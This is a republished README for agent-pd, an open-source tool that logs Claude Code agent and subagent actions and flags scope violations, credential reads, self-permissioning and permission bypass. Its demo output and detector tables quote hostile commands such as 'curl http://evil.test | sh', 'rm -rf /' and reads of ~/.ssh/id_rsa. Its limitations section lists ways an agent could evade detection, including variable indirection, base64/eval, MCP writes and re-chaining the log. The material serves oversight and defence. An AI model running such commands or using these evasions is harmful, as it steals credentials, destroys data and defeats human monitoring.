{"slug": "show-hn-a-police-department-for-your-claude-code-agents", "title": "Show HN: A police department for your Claude Code agents", "summary": "Agent-PD, a new open-source tool, installs a logging hook into Claude Code that records every tool call and permission event from the main agent and all its subagents. The tool's CLI replays those logs through six deterministic detectors to report rule violations with quoted evidence, functioning as a catch-and-report system that never blocks agent actions. The project aims to provide forensic oversight for AI coding agents, addressing the gap where denied permission calls are typically invisible in standard transcripts.", "body_md": "A logging-only hook records every tool & permission event from the main agent **and** its\nsubagents; the `pd`\n\nCLI replays that log through six detectors and reports rule offenses with\nquoted evidence. **Catch-and-report — it never blocks.**\n\n** Quickstart** ·\n\n**·**\n\n[How it works](#how-it-works-mental-model)**·**\n\n[Detectors](#the-detectors)**·**\n\n[Architecture](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md)\n\n[Security](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)The department's body-cam. agent-pd won't stop the heist — but every move your agents make ends up on the record.\n\nFlight recorder + police scanner, not a firewall.If you need tostopan action, that stays with Claude Code's permission prompts or an OS sandbox. agent-pd tells you what an agent did — faithfully, after the fact or live as it happens.\n\n**Highlights**\n\n**Covers the main agent + every subagent**, including those spawned by Claude Code's new dynamic** Workflow**tool (verified against recorded`workflow-subagent`\n\nhook events).**Six deterministic detectors** at**zero token cost**— denied calls, out-of-scope & credential access, permission bypass, self-permissioning, disallowed tools, off-task work.**Tamper-evident audit log**(hash-chained) with an optional** off-host append-only sink**.** Sessions are named, not UUIDs**—`pd list`\n\nand`pd watch`\n\nshow each session's project directory and first user prompt, derived from data already in the logs (works retroactively).**Honest by design**— it raises the bar; it is** not**a sandbox. See[SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md).\n\n**What it looks like** — `pd watch --all`\n\nacross three concurrent sessions (three projects,\nmain agents + subagents with their briefs, two genuine flags and one borderline search among\nthe ordinary work):\n\nEvery screenshot in this README is a real Terminal capture of the real engine replaying a seeded three-session fleet — reproduce them yourself with\n\n[.]`examples/demo-sessions.sh`\n\nClaude Code agents can read files, run shell commands, and spawn subagents. Most of that is\nfine — but you usually find out what an agent *actually did* only by scrolling a transcript,\nand **denied calls never reach the transcript at all** (Claude Code kills them first). agent-pd\ninstalls a hook that records every event to a per-session audit log, then gives you tools to\nask: *did any agent go out of scope, touch credentials, try to escalate, edit its own config,\nuse a tool it wasn't allowed, or wander off its brief?*\n\n```\n SETUP              CAPTURE (automatic, every session)        READ (per session or --all)\n pd install-hook  →  hook fires on every tool call        →   pd report   (forensic)\n      │                    │                                   pd watch    (live scanner)\n settings.json       ~/.claude/pd/audit/<session>.jsonl        pd judge    (opt-in LLM pass)\n```\n\nFor the full picture — system context, component, sequence, detector-pipeline, and integrity diagrams (with rendered images) — see\n\n[ARCHITECTURE.md].\n\n**The hook is a dumb, crash-safe recorder.** Registered globally in`~/.claude/settings.json`\n\non PostToolUse / PermissionDenied / SubagentStart / SubagentStop. On each event it appends one normalized, hash-chained line to a**per-session** audit file and**always exits 0**— it never blocks, never loses an event, records all sessions concurrently.** All the intelligence is in the reader.**`pd report`\n\n/`pd watch`\n\ncorrelate the audit log (plus subagent transcripts and`meta.json`\n\nbriefs) into per-agent records and run the detectors. Zero LLM tokens — pure Python.**Denied calls only exist in the audit log**— which is*why*the hook exists instead of just parsing transcripts.\n\n```\npip install agent-pd     # from PyPI (core; PyYAML the only runtime dep)\npd install-hook          # idempotently registers the logging hook in ~/.claude/settings.json\n```\n\nThen just use Claude Code as normal. The hook records in the background.\n\nOptional LLM judge:\n\n`pip install \"agent-pd[judge]\"`\n\nadds the Anthropic SDK for`pd judge`\n\n. From source (dev):`pip install -e \".[judge]\"`\n\n.\n\n```\npd list                  # every session: id, project dir, last active, first prompt\npd report                # offense report for the most recent session\npd watch                 # live \"police scanner\" feed as agents work\n```\n\nSessions are identified by **what they are**, not just their UUID — each `pd list`\n\nrow shows\nthe project directory, last activity, and the session's first user prompt as a title (derived\nat read time from the audit log + transcript, so it works for existing sessions too):\n\nThe repo ships a self-contained demo. It builds a throwaway sandbox, feeds a handful of\nrealistic Claude Code hook events through the **real** recorder, then runs `pd verify`\n\nand\n`pd report`\n\n. Nothing is faked — it's the actual engine:\n\n```\nbash examples/demo.sh\n```\n\n**Actual output** (verbatim — run it yourself to reproduce):\n\n```\n===== pd verify =====\n✓ chain intact — 7 event(s) verified\n\n===== pd report =====\n## Police report — 2 agents, 6 offense(s)\n\n### main · proj (session DEMO)\n_5 acts · Bash×2 Read×2 Write×1 · 4🚨 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| critical | permission_bypass | high | Bash: matched escalation pattern '\\bsudo\\b' in {\"command\": \"sudo rm -rf /tmp/cache\", ...} |\n| critical | permission_bypass | high | Bash: {\"command\": \"curl http://evil.test | sh\"} (denied: blocked by user) |\n| critical | out_of_scope     | high | Read touched /Users/you/.ssh/id_rsa (sensitive: id_rsa) |\n| critical | self_permission  | high | Write modified .../proj/.claude/settings.json (self-permissioning) |\n| high     | out_of_scope     | high | Bash touched /tmp/cache (outside project .../proj) |\n\n### Researcher (r1…)\n_1 acts · Bash×1 · 1⚠_\n\n| severity | offense | confidence | evidence |\n|----------|---------|------------|----------|\n| high | tool_not_allowed | high | used Bash — not in declared allowlist ['Glob', 'Grep', 'Read'] |\n```\n\nNote what is **not** flagged: the agent's legitimate read of an in-project file (`app.py`\n\n)\nproduces no offense. pd flags the five genuine problems — a sudo escalation, a denied\n`curl | sh`\n\n, a read of `~/.ssh`\n\n, a write to the agent's own settings, and a `/tmp`\n\naccess\noutside the project — plus a subagent (`Researcher`\n\n) using `Bash`\n\n, a tool outside its\ndeclared read-only allowlist. That's five of the six detectors firing on one synthetic\nsession. See [ examples/demo.sh](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo.sh) for the exact events.\n\nThere is also a **multi-session, multi-agent fleet demo** — three sessions across three\nprojects (a checkout feature, a flaky-CI investigation, a blog draft), each with subagents and\nbriefs, fed through the same real recorder. It's what every screenshot in this README shows:\n\n```\nbash examples/demo-sessions.sh\nexport PD_AUDIT_DIR=/tmp/pd-demo-fleet/audit\npd list  --projects-dir /tmp/pd-demo-fleet/projects\npd watch --all --replay --projects-dir /tmp/pd-demo-fleet/projects\n```\n\n`pd report`\n\non the fleet's flaky-CI session — per-agent digest, offense table, quoted evidence:\n\nWant to verify it on your own real Claude Code session?Follow the safe ~15-minute hands-on walkthrough in[.]`docs/manual-tests/TRY-IT-LIVE.md`\n\n```\npd install-hook                       # register the logging hook (one-time)\npd list                               # every session: id · project · last active · “first prompt”\n\npd report                             # offense report, most recent session\npd report --session <id> --format md  # md | json | both\npd report --verbose                   # full evidence + files-touched per agent\npd report --agent <id|main>           # focus one agent: digest + every action it took\n\npd watch                              # live feed, most recent session — streams NEW activity\n                                      #   from now (like tail -f); existing backlog is skipped\npd watch --replay                     # replay the whole session's backlog first, then tail\npd watch --all                        # merged feed across ALL sessions (§session tag; an intro\n                                      #   line names each session's project + first prompt)\npd watch --crimes-only                # quiet unless something's wrong\npd watch --verbose                    # full commands + reasons, no truncation\npd watch --session <id> --no-color --no-emoji   # plain terminals / SSH\n\npd verify                             # check the audit-log hash-chain (most recent session)\npd verify --all                       # verify every session; exit 2 on tamper/truncation\n                                      # set PD_AUDIT_KEY for HMAC-keyed integrity\n\npd judge                              # dry run (free): items / agents / ≈token estimate\npd judge --run --via-claude-code      # confirm off_task flags on your Claude subscription\npd judge --run --model sonnet --max 20    # or via the metered Anthropic API\n\npd compact [--session ID] [--prune-older-than DAYS] [--dry-run]\n                                      # gzip old logs (<sid>.jsonl -> .jsonl.gz); skips the active\n                                      # session; lossless for detection. Optional age-based prune.\n\npd sink push [--session ID] [--all]   # forward un-sent chained events off-host (append-only sink)\npd sink status [--session ID] [--all] # forwarded/last per session; flags \"remote ahead\"\n```\n\nSix deterministic detectors (zero tokens) plus one opt-in LLM pass.\n\n| Offense | Severity | What it catches | Confidence |\n|---|---|---|---|\n`permission_bypass` |\ncritical | Denied calls + a two-tier Bash scan: never-downgrade catastrophic (`rm -rf /` , fork bomb, `curl|sh` , `dd of=/dev/…` ) stay critical under any allow-rule; downgradable escalation (sudo, `chmod 777` , cwd-wipe) only by a precise rule. |\nhigh |\n`out_of_scope` |\nhigh / critical | File or Bash path outside the project (auto: git root or cwd), or outside configured `scope_dirs` . Sensitive paths (`~/.ssh` , `~/.aws` , `~/.claude` , `/etc/shadow` , shell history…) are always critical and never downgraded. |\nhigh |\n`self_permission` |\ncritical | Any agent write to its own control files (`.claude/settings*.json` , `.claude/agents/*.md` , `pd-rules*.yaml` ) via any method — Write/Edit/NotebookEdit or Bash `cp` /`mv` /`tee` /`sed` /`python` /`base64` /redirect — regardless of content. |\nhigh |\n`tool_not_allowed` |\nhigh | A subagent uses a tool outside its declared `tools:` allowlist (`.claude/agents/<type>.md` ). |\nhigh |\n`redundant` |\nlow | Exact-duplicate tool calls (ignores Bash `description` noise). |\nhigh |\n`off_task` |\nreview | Search/query terms vs. the agent's brief, by word-overlap below a threshold. | low — heuristic |\n\nThe five deterministic detectors are trustworthy and free. `off_task`\n\nis intentionally noisy\nand hard-labeled low-confidence — the **judge** (below) turns it into high-confidence verdicts.\n\n`out_of_scope`\n\nand escalation hits are **downgraded to a quiet info severity** when the action\nmatches a permission\n\n**allow-rule** you configured (\n\n`permissions.allow`\n\nin `~/.claude/settings.json`\n\nor project `.claude/settings.local.json`\n\n) — *authorized → info, unauthorized → full severity*.\n\nMatching is **faithful to Claude Code's own semantics**: shell-operator splitting (a `Bash(git:*)`\n\nrule does **not** license `git status && rm -rf ~`\n\n), command-substitution / backtick extraction,\nredirect targets as a separate authorization, word-boundary prefixes (`npm install:*`\n\n≠\n`npm installmalware`\n\n), and gitignore-style globs. Ambiguity resolves **conservatively → not\npermitted** (under-flagging is worse than over-flagging). Two things are **never** downgraded:\nsensitive-path access and categorically-catastrophic commands. A denied call stays critical\nregardless — a denial is unpermitted by definition.\n\nAn optional LLM pass that reads each agent's brief and its flagged searches, then confirms or\ndrops the noisy `off_task`\n\nflags. Built to cost almost nothing:\n\n**Opt-in**— never runs in the hook or`pd watch`\n\n.**Dry-run by default**— prints an estimate; add`--run`\n\nto actually call.**Pre-filtered + batched**— only already-flagged items, one API call per agent.** Two backends:**`--via-claude-code`\n\nshells out to the headless`claude`\n\nCLI (**your Claude subscription, no API key**), or the metered Anthropic API (`pip install -e \".[judge]\"`\n\n+`ANTHROPIC_API_KEY`\n\n).`--model haiku|sonnet|opus`\n\n(default haiku),`--max N`\n\n.\n\nIn the demo fleet, the orders-api subagent rabbit-holed into a CI-infra search with zero word-overlap against its brief — the heuristic flags it for review, and the dry run prices out exactly what confirming it would cost:\n\nA real-time feed of what your agents are doing and which rules they're breaking. The header\n**names the session it attached to** — project directory plus the session's first prompt — so\nattaching to the default (most recent) session is never a mystery:\n\nEach agent gets a stable color and a banner with its assigned brief; every action is a feed\nline with a severity badge; a live rap-sheet footer tallies crimes per agent. With `--all`\n\n(merged feed across every session) the first time a session appears it prints a\n`§sid · project · “title”`\n\nintro line, so interleaved sessions stay tellable-apart — see the\nfleet screenshot at the top of this README.\n\n`--crimes-only`\n\nkeeps the feed quiet unless something is actually wrong — only flagged actions\nstream — and Ctrl-C prints a final **rap sheet** tallying every agent in every session:\n\nZero extra dependencies — ANSI only. The full annotated\nscreenshot set lives in [docs/test-evidence.md](https://github.com/varmabudharaju/agent-pd/blob/master/docs/test-evidence.md).\n\nEvery event carries a `seq`\n\nand a `chain = sha256(prev_chain + canonical(event))`\n\n(HMAC-SHA256\nif `PD_AUDIT_KEY`\n\nis set), computed by the hook under a per-session file lock with a\n`<sid>.head.json`\n\nanchor. ** pd verify** recomputes the chain and reports\n\n`✓ intact`\n\n,\n`✗ TAMPER DETECTED`\n\n, or `✗ TRUNCATED`\n\n(exit 2), and holds across `pd compact`\n\n. Here's it\ncatching both attacks for real — one event deleted from a log's tail, then one byte flipped\ninside a recorded command (the compacted session still verifies):This is tamper-**evident**, not tamper-** proof**: a same-user agent with Bash can re-chain the\nwhole file. To close the *retroactive-deletion* half of that gap, ** pd sink push** forwards each\nchained event to an\n\n**off-host, append-only destination**(file or http backend; env-only\n\n`PD_SINK_TOKEN`\n\n; `https://`\n\nenforced for remote tokens; redirects not followed). Once an event has\nshipped off-host, a later local rewrite can't reach it. **flags \"remote ahead\" when more events shipped than remain locally — a truncation signal:**\n\n`pd sink status`\n\nAppend-only is a\n\ndeployment requirementpd can't enforce, and the sink does not stop a same-user agent fromforgingentries ordisablingthe hook. Read[SECURITY.md]for the full, honest framing before relying on any of this.\n\nagent-pd **raises the bar; it is not a sandbox.** A determined same-privilege adversary using\nobfuscation or indirection can evade static detection. Known limits, in plain terms:\n\n**Obfuscation / indirection evades static detection.** Multi-level`$VAR`\n\nchains (`A=/etc/shadow; B=$A; cat $B`\n\n— only single-level expansion is followed),`$IFS`\n\n/ word-split tricks, two-step download-then-exec (`curl -o f url; sh f`\n\n), base64/eval-assembled commands, and dynamically-built paths can slip past.**Non-Bash file-write MCP tools bypass** Only Write/Edit/NotebookEdit and Bash are inspected for control-file writes; a filesystem MCP tool with a different shape could write`self_permission`\n\n.`.claude/settings.json`\n\nundetected.(word-overlap) and can't run on the main agent or on Workflow subagents (no brief).`off_task`\n\nis heuristic`pd judge`\n\nis the trustworthy path.and can be noisy (it holds innocuous app config too).`~/.config`\n\nsensitivity is broad**Tool**— the hook captures*results*aren't surfaced`tool_input`\n\nand an outcome flag, not full`tool_response`\n\n, to keep the audit log from bloating. The feed shows what an agent*did*, not its output.**Audit integrity is tamper-evident, not tamper-proof**(above), and the off-host sink's append-only guarantee is the operator's responsibility.** Symlink resolution is best-effort**(the symlink must exist at analysis time).** Sessions that predate the hook**(transcript-only, no`<sid>.jsonl`\n\n) don't appear in`pd report`\n\n.\n\nThe full ledger of shipped / residual / declined items lives in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\nPrioritized, none blocking — scoped so any one can be picked up independently:\n\n**Tool-agnostic control-file detection**— flag*any*tool whose input names a control path in a write-shaped field (closes the MCP`self_permission`\n\ngap).**Multi-level**— iterate variable substitution to a fixed point so 2-hop indirection (`$VAR`\n\nresolution`B=$A`\n\n) no longer hides a sensitive path.**Truncate / cap** at capture to keep raw`tool_result`\n\n`.jsonl`\n\nsmall.**Narrow** to credential-bearing subpaths (`~/.config`\n\nsensitivity`gh`\n\n,`gcloud`\n\n, …) to cut noise.**Sink enhancements**— chunk large backlogs, a syslog backend, and`pd verify --against-sink`\n\nread-back reconciliation.— per-agent digest (files touched, time span, tool histogram).`pd summary <session>`\n\n**Judge verdict disk cache**— skip re-judging identical (brief, search) pairs.** Capture more hook events**(`PostToolUseFailure`\n\n,`PreCompact`\n\n,`SessionEnd`\n\n) to enrich timelines.\n\nagent-pd works out of the box with no config — every rule (sensitive paths, escalation\npatterns, severities, the `off_task`\n\nthreshold) ships as a built-in default. A `pd-rules.yaml`\n\nfile is **optional**, and only needed to override those defaults.\n\nWhen you do write one, every command **auto-discovers** it — no flag required. On each run `pd`\n\nlooks for `pd-rules.yaml`\n\nin this order and uses the first it finds, deep-merged over the\nbuilt-in defaults:\n\n- the current directory\n- the enclosing\n**project root**(the git root above the cwd) `~/.claude/pd-rules.yaml`\n\n(a global default for all projects)\n\nPrecedence is ** --rules <path> › auto-discovered file › built-in defaults** — pass\n\n`--rules`\n\non any command (including `pd watch`\n\n) to point at a specific file and override discovery. See\n`pd-rules.yaml`\n\nin this repo for every supported key (`scope_dirs`\n\n, sensitive paths, the two\nescalation tiers, severities, `off_task_overlap_threshold`\n\n, `storage`\n\n, and a `sink`\n\nsection).Lists in\n\n`pd-rules.yaml`\n\nreplacethe corresponding default list (deep-merge replaces lists, not appends) — so if you set`sensitive_patterns`\n\n, include the built-ins you still want.\n\nThe off-host sink also reads env overrides: `PD_SINK_TYPE=file|http`\n\n, `PD_SINK_PATH`\n\n/\n`PD_SINK_URL`\n\n, `PD_SINK_TIMEOUT`\n\n, and the **env-only** `PD_SINK_TOKEN`\n\n(ignored if placed in a\nconfig file, so it never lands in a checked-in or world-readable file).\n\n```\n~/.claude/pd/audit/<sid>.jsonl      # live capture (hook appends here)\n~/.claude/pd/audit/<sid>.jsonl.gz   # compacted (pd compact, gzip)\n```\n\nThe audit log stores **full tool inputs** — file contents and Bash commands — which **may include\nsecrets in plaintext**. It lives **outside your repo** (won't be committed by accident) but treat\nit like any sensitive local file. `pd compact`\n\ngzips, it does **not** encrypt. Nothing is uploaded\nunless you configure a sink. To clear it: `rm ~/.claude/pd/audit/*.jsonl`\n\n(it repopulates as\nsessions run).\n\n**Choosing where logs go.** The default is deliberately a hidden, local, non-repo path. To put\nlogs somewhere you choose, set `PD_AUDIT_DIR`\n\n, or bake it into the hook at install time:\n\n```\npd install-hook --audit-dir ~/agent-pd-logs   # hook + CLI both use this path\n# or, per shell: export PD_AUDIT_DIR=~/agent-pd-logs\n```\n\nBoth the hook (writes) and every `pd`\n\ncommand (reads) honor `PD_AUDIT_DIR`\n\n(precedence:\n`--audit-dir`\n\nflag › `PD_AUDIT_DIR`\n\n› default). A **relative** path is resolved to an absolute\none when it's set (the install flag bakes the absolute path; `PD_AUDIT_DIR`\n\nis absolutized when\nread), so logs always land in one fixed place instead of scattering into whatever directory each\nagent happens to run in. Still, **don't** point it at a repo folder or a cloud-synced directory\n(iCloud/Dropbox) unless you accept that plaintext tool inputs — possibly secrets — will be\ncommitted or synced off-machine.\n\n```\npip install --user -e .          # core\npip install --user -e \".[judge]\" # + anthropic SDK (only for the API judge backend)\npython3 -m pytest -q             # 474 tests, pure (no API key needed)\n```\n\nTDD throughout; detectors, render, live, and judge are all unit-tested with no network. For the\ndesign in depth: [SYSTEM-DESIGN.md](https://github.com/varmabudharaju/agent-pd/blob/master/SYSTEM-DESIGN.md) (formal design doc — goals, components,\npermission model, trade-offs) and [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) (diagrams). Honest\nlimitations and roadmap live in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).\n\n[Apache License 2.0](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE) © Sai Ram Varma Budharaju. Free to use, modify, and distribute (including\ncommercially); retain the copyright and license notice. Includes a patent grant.", "url": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents", "canonical_source": "https://github.com/varmabudharaju/agent-pd/blob/master/README.md", "published_at": "2026-06-11 17:47:39+00:00", "updated_at": "2026-06-11 19:23:29.774195+00:00", "lang": "en", "topics": ["ai-agents", "ai-tools", "ai-safety", "ai-products", "ai-infrastructure"], "entities": ["Claude Code", "agent-pd", "varmabudharaju"], "alternates": {"html": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents", "markdown": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents.md", "text": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents.txt", "jsonld": "https://wpnews.pro/news/show-hn-a-police-department-for-your-claude-code-agents.jsonld"}}